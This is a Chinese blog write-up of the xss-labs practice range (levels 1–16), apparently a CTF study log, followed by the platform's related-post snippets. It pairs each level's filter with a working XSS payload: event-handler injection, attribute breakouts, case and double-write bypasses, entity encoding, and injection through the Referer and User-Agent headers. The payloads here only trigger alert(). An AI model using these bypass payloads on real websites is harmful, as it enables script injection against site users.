xss lab

最新推荐文章于 2024-07-29 19:34:02 发布
最新推荐文章于 2024-07-29 19:34:02 发布
阅读量842 收藏
点赞数
分类专栏: ctf 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50038211/article/details/127815373
版权

目录

xss lab

level1

<img src=1 οnerrοr=alert('1')>

level2

闭合

"/><img src=1 onerror=alert(1)>

level3

过滤< >

' onfocus=javascript:alert('xss') class='

level4

" οnfοcus=javascript:alert('xss') class="

level5

过滤事件 onfocus/script 等关键字 添加_干扰

"> <a href=javascript:alert('xss')>xss</a> //

level6

过滤href 大写绕过

"> <a Href=javascript:alert('xss')>xss</a> //

level7

直接删除关键字 双写绕过

"> <a hrhrefef=javascrscriptipt:alert('xss')>xss</a> //

level8

过滤引号 <> 关键字添加_干扰 对javascript unicode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;

level9

检查有无url,加一个即可 unicode编码能绕过替换关键词

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;//http://

level10

hidden input

t_sort=" οnfοcus=javascript:alert('xss') //

level11

看源码改refer头

"type="text" οnclick=javascript:alert('xss')//

level12

直接改ua头

"type="text" οnclick=javascript:alert('xss')//

level13

应该是改cookie, 题目有点问题

"type="text" οnclick=javascript:alert('xss')//

level14

看wp是文件解析引发xss

在图片的exif信息里加xss

但是链接挂了 x不了

'"><img src=1 onerror=alert(document.domain)>'

level15

AngularJS的javascript框架漏洞

ng-include 可以将部分代码打包成独立文件,在使用ng-include来引用这个独立的HTML文件, 类似文件包含漏洞

环境有点问题

src='level4.php?keyword=%22%20οnmοuseοver=alert(1)%20%22'

level16

过滤空格

<img src=1 onerror=alert(1)>
<img%0asrc=1%0aοnerrοr=alert(1)>

level17/8/9/0

都用的flash,浏览器不支持,懒得做了

MonTuee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xsslab练习
menghuangjh的博客
10-26 258
第七关 输入一波关键词,发现都被过滤,类似于文件上传。 想到了双写绕过,试了一下 发现可行,构造payload:"><sscriptcript>alert('1')</scripscriptt><" 第八关 还是先来试一下发现<>和"被过滤所以考虑用Javascript:alert(1) 发现被script被替换了。试了下双写还是不行。最后试了下html的实体编码。发现可以绕过。于是构造payload:&#106;&#97;&#...
XSS lab 1~14
m0_74047291的博客
11-10 260
xss初学者的作业
xsslab
m0_65151172的博客
04-08 152
(解释一下onclick函数,正常格式的onclick是这样的onclick='alert(1)',这个函数是在点击的时候触发的,之所以我们注入代码是这样的' onclick='alert(1)是因为onclick函数得在一个标签中才能被浏览器识别,所以我们第一个单引号是用来闭合value='这个单引号的,第二个单引号是用来和'>这个单引号形成闭合构成onclick正常的语句的,而且,第一个单引号和onclick 中间得有空格,这样onclick才能被识别出来是个函数 )">xss</a>,成了!
菜鸟通关Xss-labs记录(1-16)
最新发布
hhsjjsj的博客
07-29 1024
菜鸟通过Xss-labs记录
XSS-labs
Mccc_li的博客
04-09 1083
大佬总结的xss的原理 1.level1 输入 < script>alert<\script>就通过了,这道题应该是反射型的xss,数据到了后端再回到浏览器 为什么能够运行? GET输入了name的参数,然后 PHP 会读取该参数,如果不为空,则直接打印出来,这里不存在任何过滤。也就是说,如果参数中存在 HTML 结构性的内容,打印之后会直接解释为 HTML 元素。 常见...
xss-labs
2302_80044238的博客
03-23 1057
jsp的全称是java servlet page 它就是java的服务器页面因为它相对于servlet传回数据的方法比较简单Servlet的本质是一个,旨在处理HTTP请求并生成HTTP响应。
XSSLab (1~10)
开心星人的博客
05-14 312
一 http://test.ctf8.com/level1.php?name=<script>alert(1)</script> 二 输入<script>alert(1)</script> 查看源码看到<input name=keyword value="<script>alert(1)<script>"> 构造 " onclick="alert(1) 三 输入" onclick="alert(1) 查看源码看到<i
xss-labs 小结
China
04-09 327
xss-labs hgfghf ghfhgj XSS总结 思路总结 1、当服务器未对输入值做任何过滤原样echo ? 反射性xss 流程总结 level1 有个回显,所以就可以选择插入一个payload <script>alert(‘xss’)</script> #alert是一个弹窗,所有的js代码都要放在<script>里面才会被当作js代码执行 url框的name后面 当服务器未对输入值做任何过滤原样echo ? 通过查看level1.php得知 $s
xss lab 靶场练习(1~10)
m0_52438027的博客
08-05 267
在下面的语法中我们可以看到,他默认编码双引号,但需要ent_quotes这个函数才可以同时编码双引号和单引号,而源码中并没有这个函数,并且源码中是用单引号来闭合的,所以我们可以通过单引号来逃离限制。第十关没有输入的地方这是我们打开源码发现只有在input下才可以注入,但我们发现只有在t_sort下才可以注入其他的不行。这里我们可以看到我们输入的内容在href标签下并且不能逃离双引号的限制,所以我们只能通过JavaScript标签来绕过。我们可以通过闭合双引号的方式来使我们的语句逃离他的限制。...
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9305
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
【Portswigger-web-security-academy】xss lab
No Title
12-29 569
Lab: Reflected XSS into HTML context with all tags blocked except custom ones 题目提示是拦截了所有html标签,只能使用自定义标签。先尝试在搜索框中写入自定义标签: <custom id=test> 查看网页源代码: <header class="notification-header"> </header> <section class=blog-header> &l
xsslabs.zip
07-23
xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法,是学习xss的必备工具
xss-lab全通关教程
05-07
xss-lab全通关教程,共有20个关,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
XSS-Lab 1-10
qq_51558360的博客
03-21 301
不使用过滤器 name=<script>alert(1)</script> 闭合标签 输入第一题的答案,没有成功,查看源码,发现: 我们输入的数据,是在表单中的value属性内 法一: 所以需要先闭合input标签,然后在注入代码,闭合标签: "><script>alert(1)</script> 法二: 是闭合value属性,然后在input标签内加入事件属性: " οnclick="alert(11) 单引号闭合并添加事件 输入测试:
xsslab随笔
weixin_42306891的博客
07-03 194
这里采用火狐浏览器本地环境搭建,项目地址:https://github.com/do0dl3/xss-labs lab1 查看源代码 和url对照 是直接将传入的name在插入在标签之间,而且返回了字符串长度,所以这里尝试反射性xss,?name=<script>alert('xss')</script>,其实若分析对应php代码,发现,他将name使用get方式传入字符串放入<h2></h2>中,未进行防护过滤,所以存在反射性xss
XSS-Lab 1-15
震山的博客
08-25 323
个人 XSS-Lab 通关记录
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 5031
XSS-LabXSS注入笔记1-16)
XSS靶场闯关(xss-labs)
小郑的博客
04-22 1984
对数据进行了是否含有http://做了判断,并对关键字做了替换,把数据加到了a标签的href属性中,在属性中的数据可以考虑编码,并利用js的注释符//注释掉http://当前页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性中,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。
XSS-Lab靶场
Poolhuang的博客
08-09 874
XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际上这个请求是在被攻击者不知情的情况下发起的,由此攻击者在一定程度上达到了冒充被攻击者的目的。...
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否包含"http://"字段。因此,为了通过这一关,我们需要在输入的字段中加入该字段,例如输入"java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://')"。这样,当受害者访问该页面时,恶意代码会在其浏览器上执行,从而成功通过第十关。 #### 引用[.reference_title] - *1* *2* *3* [XSS攻击-xss-lab(1-10)详细讲解](https://blog.csdn.net/qq_43395215/article/details/105955004)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值